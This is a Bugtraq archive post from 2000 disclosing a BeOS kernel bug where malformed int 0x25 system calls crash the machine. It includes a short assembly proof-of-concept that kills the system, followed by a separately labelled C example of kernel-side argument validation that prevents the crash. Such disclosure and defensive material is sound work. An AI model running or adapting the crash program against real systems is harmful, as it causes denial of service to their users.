Bugtraq
mailing list archives
BeOS syscall bug
From: konst () LINUXASSEMBLY ORG (Konstantin Boldyshev)
Date: Mon, 10 Apr 2000 13:16:28 -0000
Summary:
BeOS crashes when a system call with invalid parameters is
issued.
Details:
When using direct kernel calls through int 0x25 (not
libroot.so functions) BeOS dies on most system calls with
invalid parameters/stack. Although Be has registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available, it's a kernel bug.
Here's a sample assembly program that kills BeOS (nasm):
section .text
global _start

_start:
        push    dword msg
        push    dword len
        push    dword 1         ;stdout
        mov     eax,3           ;sys_write
        int     0x25            ;must be a *call* to int 0x25,
                                ;then everything goes ok; i.e.
                                ;return address must be on the stack,
                                ;but it is not
        mov     eax,0x3f        ;sys_exit
        int     0x25

msg     db      "hello",0xa
len     equ     $ - msg
(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)
References:
http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing")
http://linuxassembly.org - Linux/UNIX assembly programming
portal
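
The kernel-side check whose absence turns a malformed frame into a crash, as an added example (not BeOS code and not part of the original post): a simulated syscall entry that validates the user stack frame and the buffer range before touching them. The return-address slot at [esp] follows the comment in the post; the (fd, buf, count) argument order, the 0x1000 region, the error value and all names are assumptions.

```c
#include <stdint.h>
#include <string.h>

#define ERR_FAULT (-14)   /* constructed error code for this example */

/* Simulated user address space: one mapped region [base, base+size). */
struct uspace { uint32_t base, size; const uint8_t *mem; };

/* Overflow-safe test that [addr, addr+len) lies inside the user region. */
static int user_range_ok(const struct uspace *u, uint32_t addr, uint32_t len)
{
    if (addr < u->base) return 0;
    uint32_t off = addr - u->base;
    return off <= u->size && len <= u->size - off;
}

/* Copy nargs 32-bit arguments from the user stack, skipping the assumed
 * return-address slot at [esp]; fail instead of dereferencing blindly. */
static int fetch_args(const struct uspace *u, uint32_t esp, uint32_t nargs,
                      uint32_t *out)
{
    if (nargs > 8 || (esp & 3) != 0) return ERR_FAULT;
    if (!user_range_ok(u, esp, 4 * (nargs + 1))) return ERR_FAULT;
    memcpy(out, u->mem + (esp - u->base) + 4, 4 * nargs);
    return 0;
}

/* Hypothetical write handler: validate the frame, then the buffer range. */
static int sys_write_checked(const struct uspace *u, uint32_t esp)
{
    uint32_t a[3];                       /* fd, buf, count (assumed order) */
    int rc = fetch_args(u, esp, 3, a);
    if (rc != 0) return rc;
    if (!user_range_ok(u, a[1], a[2])) return ERR_FAULT;
    return (int)a[2];                    /* pretend the bytes were written */
}

/* Constructed frames: a well-formed one (return address first), and one
 * pushed as in the post (no return address), which shifts every argument
 * so that "count" becomes whatever word sits above the frame. */
const uint32_t FRAME_OK[4]   = { 0x1234, 1, 0x1020, 6 };
const uint32_t FRAME_POST[4] = { 1, 6, 0x1020, 0xFFFFFFF0 };

/* Build a 64-byte user region at 0x1000 and run the handler on it. */
int run_frame(const uint32_t w[4], uint32_t esp_off)
{
    uint8_t mem[64] = {0};
    memcpy(mem, w, 16);
    memcpy(mem + 32, "hello\n", 6);
    struct uspace u = { 0x1000, sizeof mem, mem };
    return sys_write_checked(&u, 0x1000 + esp_off);
}
```

With these checks the shifted frame returns an error to the caller; the same holds for a stack pointer that is misaligned or leaves too little mapped memory for the frame.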